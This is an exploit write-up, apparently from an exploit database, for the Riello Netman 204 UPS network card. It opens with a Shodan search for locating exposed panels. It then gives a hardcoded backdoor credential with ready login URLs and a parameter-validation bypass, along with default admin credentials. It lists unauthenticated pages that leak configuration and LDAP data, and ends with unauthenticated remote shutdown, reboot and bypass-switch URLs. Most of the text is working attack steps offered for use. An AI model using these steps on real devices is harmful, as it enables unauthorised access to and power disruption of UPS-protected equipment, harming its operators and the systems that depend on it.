Netman 204 - Broken Access Control Remote command

# Exploit Title: Netman 204 - Broken Access Control Remote command
# Date: 1/28/2025
# Exploit Author: parsa rezaie khiabanloo
# Vendor Homepage: netman-204 (https://www.riello-ups.com/downloads/25-netman-204)
# Version: netman-204
# Tested on: Windows/Linux

Step 1 : Attacker can using these dorks then can find the UPS panel .

Shodan :   http.favicon.hash:22913038  OR  https://www.shodan.io/search?query=netman+204+cgi-bin

# We Found Two panel  Yellow and blue 

Step 2 : For Yellow panel attacker can use these username and password because there have backdoor and for Blue panel we can use the Remote commands  and burpsuite repeater to see the details of the ups .

Yellow Panel : username and password : eurek

Some exploits for that :

http://[IP]/cgi-bin/login.cgi?username=eurek&password=eurek
or
https://[IP]/cgi-bin/login.cgi?username=eurek&password=eurek

Due to flaws in parameter validation, the URL can be shortened to:

http://[IP]/cgi-bin/login.cgi?username=eurek%20eurek
or
https://[IP]/cgi-bin/login.cgi?username=eurek%20eurek


Blue Panel : username and password : admin

Some Critical leaks without authentication we can see : 

http://IP/administration-commands.html
http://IP/administration.html
http://IP/administration.html#
http://IP/administration.html#LDAP
http://IP/administration.html#active-users
http://IP/administration.html#firmware-upgrade
http://IP/configuration.html
http://IP/history.html
http://IP/index.html
http://IP/login.html
http://IP/system-overview.html
http://IP/table.html

#With using up paths we can see the details of the UPS without authentication .

First open burpsuite and intercept the requests then use the up paths and after that send that request to the repeater then send it again and in your response open the render and enjoy :) 

Some Remote commands without authentication : 

http://IP/administration-commands.html
http://IP/administration-commands.html#
http://IP/administration-commands.html#reboot-irms
http://IP/administration-commands.html#reboot-mdu
http://IP/administration-commands.html#reboot-xts
http://IP/administration-commands.html#shutdown
http://IP/administration-commands.html#shutdown-irms
http://IP/administration-commands.html#shutdown-mdu
http://IP/administration-commands.html#shutdown-restore
http://IP/administration-commands.html#shutdown-restore-irms
http://IP/administration-commands.html#shutdown-restore-mdu
http://IP/administration-commands.html#shutdown-restore-xts
http://IP/administration-commands.html#shutdown-xts
http://IP/administration-commands.html#shutdownrestore
http://IP/administration-commands.html#switch-irms
http://IP/administration-commands.html#switch-on-bypass
http://IP/administration-commands.html#test-battery